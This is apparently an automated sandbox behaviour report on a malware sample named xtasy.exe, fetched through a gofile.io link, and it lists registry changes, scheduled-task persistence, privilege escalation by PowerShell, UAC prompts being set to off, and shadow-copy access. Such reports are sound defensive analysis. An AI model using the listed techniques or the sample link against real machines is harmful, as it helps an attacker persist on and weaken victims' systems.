\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 59 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchApp.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2366345620-3342093254-3461191856-1000\{82F8464B-8100-425B-89B2-07E11B7162E0} wmplayer.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\NumberOfSubdomains = "1" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\MuiCache SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheLimit = "51200" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search\ = "0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell taskmgr.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2366345620-3342093254-3461191856-1000\{6C797753-C76A-4B9F-BC69-F07B7AC31C2F} wmplayer.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CacheVersion = "1" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search\NumberOfSubdomains = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CacheVersion = "1" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CacheLimit = "1" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total\ = "0" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff taskmgr.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CacheLimit = "1" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\ = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search\Total = "0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings xtasy.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\NumberOfSubdomains = "0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState\EdpState = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState\EdpCleanupState = "0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 taskmgr.exe Set value (str) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheVersion = "1" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23" SearchApp.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 6468 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 935461.crdownload:SmartScreen msedge.exe -
Runs net.exe
-
Runs regedit.exe 1 IoCs
pid Process 4680 regedit.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5940 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5032 msedge.exe 5032 msedge.exe 1088 msedge.exe 1088 msedge.exe 5112 identity_helper.exe 5112 identity_helper.exe 1004 msedge.exe 1004 msedge.exe 5260 powershell.exe 5260 powershell.exe 5260 powershell.exe 5528 powershell.exe 5528 powershell.exe 5528 powershell.exe 5756 powershell.exe 5756 powershell.exe 5756 powershell.exe 5964 powershell.exe 5964 powershell.exe 5964 powershell.exe 2616 xtasy.exe 2616 xtasy.exe 2616 xtasy.exe 864 powershell.exe 864 powershell.exe 864 powershell.exe 864 powershell.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3364 taskmgr.exe 2012 cleanmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2616 xtasy.exe Token: SeDebugPrivilege 5260 powershell.exe Token: SeIncreaseQuotaPrivilege 5260 powershell.exe Token: SeSecurityPrivilege 5260 powershell.exe Token: SeTakeOwnershipPrivilege 5260 powershell.exe Token: SeLoadDriverPrivilege 5260 powershell.exe Token: SeSystemProfilePrivilege 5260 powershell.exe Token: SeSystemtimePrivilege 5260 powershell.exe Token: SeProfSingleProcessPrivilege 5260 powershell.exe Token: SeIncBasePriorityPrivilege 5260 powershell.exe Token: SeCreatePagefilePrivilege 5260 powershell.exe Token: SeBackupPrivilege 5260 powershell.exe Token: SeRestorePrivilege 5260 powershell.exe Token: SeShutdownPrivilege 5260 powershell.exe Token: SeDebugPrivilege 5260 powershell.exe Token: SeSystemEnvironmentPrivilege 5260 powershell.exe Token: SeRemoteShutdownPrivilege 5260 powershell.exe Token: SeUndockPrivilege 5260 powershell.exe Token: SeManageVolumePrivilege 5260 powershell.exe Token: 33 5260 powershell.exe Token: 34 5260 powershell.exe Token: 35 5260 powershell.exe Token: 36 5260 powershell.exe Token: SeDebugPrivilege 5528 powershell.exe Token: SeIncreaseQuotaPrivilege 5528 powershell.exe Token: SeSecurityPrivilege 5528 powershell.exe Token: SeTakeOwnershipPrivilege 5528 powershell.exe Token: SeLoadDriverPrivilege 5528 powershell.exe Token: SeSystemProfilePrivilege 5528 powershell.exe Token: SeSystemtimePrivilege 5528 powershell.exe Token: SeProfSingleProcessPrivilege 5528 powershell.exe Token: SeIncBasePriorityPrivilege 5528 powershell.exe Token: SeCreatePagefilePrivilege 5528 powershell.exe Token: SeBackupPrivilege 5528 powershell.exe Token: SeRestorePrivilege 5528 powershell.exe Token: SeShutdownPrivilege 5528 powershell.exe Token: SeDebugPrivilege 5528 powershell.exe Token: SeSystemEnvironmentPrivilege 5528 powershell.exe Token: SeRemoteShutdownPrivilege 5528 powershell.exe Token: SeUndockPrivilege 5528 powershell.exe Token: SeManageVolumePrivilege 5528 powershell.exe Token: 33 5528 powershell.exe Token: 34 5528 powershell.exe Token: 35 5528 powershell.exe Token: 36 5528 powershell.exe Token: SeDebugPrivilege 5756 powershell.exe Token: SeIncreaseQuotaPrivilege 5756 powershell.exe Token: SeSecurityPrivilege 5756 powershell.exe Token: SeTakeOwnershipPrivilege 5756 powershell.exe Token: SeLoadDriverPrivilege 5756 powershell.exe Token: SeSystemProfilePrivilege 5756 powershell.exe Token: SeSystemtimePrivilege 5756 powershell.exe Token: SeProfSingleProcessPrivilege 5756 powershell.exe Token: SeIncBasePriorityPrivilege 5756 powershell.exe Token: SeCreatePagefilePrivilege 5756 powershell.exe Token: SeBackupPrivilege 5756 powershell.exe Token: SeRestorePrivilege 5756 powershell.exe Token: SeShutdownPrivilege 5756 powershell.exe Token: SeDebugPrivilege 5756 powershell.exe Token: SeSystemEnvironmentPrivilege 5756 powershell.exe Token: SeRemoteShutdownPrivilege 5756 powershell.exe Token: SeUndockPrivilege 5756 powershell.exe Token: SeManageVolumePrivilege 5756 powershell.exe Token: 33 5756 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 5192 SecurityHealthSystray.exe 5192 SecurityHealthSystray.exe 5192 SecurityHealthSystray.exe 5192 SecurityHealthSystray.exe 5364 SecurityHealthSystray.exe 5364 SecurityHealthSystray.exe 5364 SecurityHealthSystray.exe 5364 SecurityHealthSystray.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 1088 msedge.exe 5192 SecurityHealthSystray.exe 5192 SecurityHealthSystray.exe 5192 SecurityHealthSystray.exe 5364 SecurityHealthSystray.exe 5364 SecurityHealthSystray.exe 5364 SecurityHealthSystray.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe 3364 taskmgr.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 2552 MpCmdRun.exe 5016 SecHealthUI.exe 3516 WindowsBackupClient.exe 6716 wmplayer.exe 4384 wmplayer.exe 5556 firefox.exe 5556 firefox.exe 5556 firefox.exe 5556 firefox.exe 5556 firefox.exe 5556 firefox.exe 5556 firefox.exe 5556 firefox.exe 5556 firefox.exe 5556 firefox.exe 4704 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1088 wrote to memory of 732 1088 msedge.exe 81 PID 1088 wrote to memory of 732 1088 msedge.exe 81 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 2784 1088 msedge.exe 82 PID 1088 wrote to memory of 5032 1088 msedge.exe 83 PID 1088 wrote to memory of 5032 1088 msedge.exe 83 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 PID 1088 wrote to memory of 3464 1088 msedge.exe 84 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\policies\system xtasy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" xtasy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" xtasy.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/UtAbQk1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1088 -
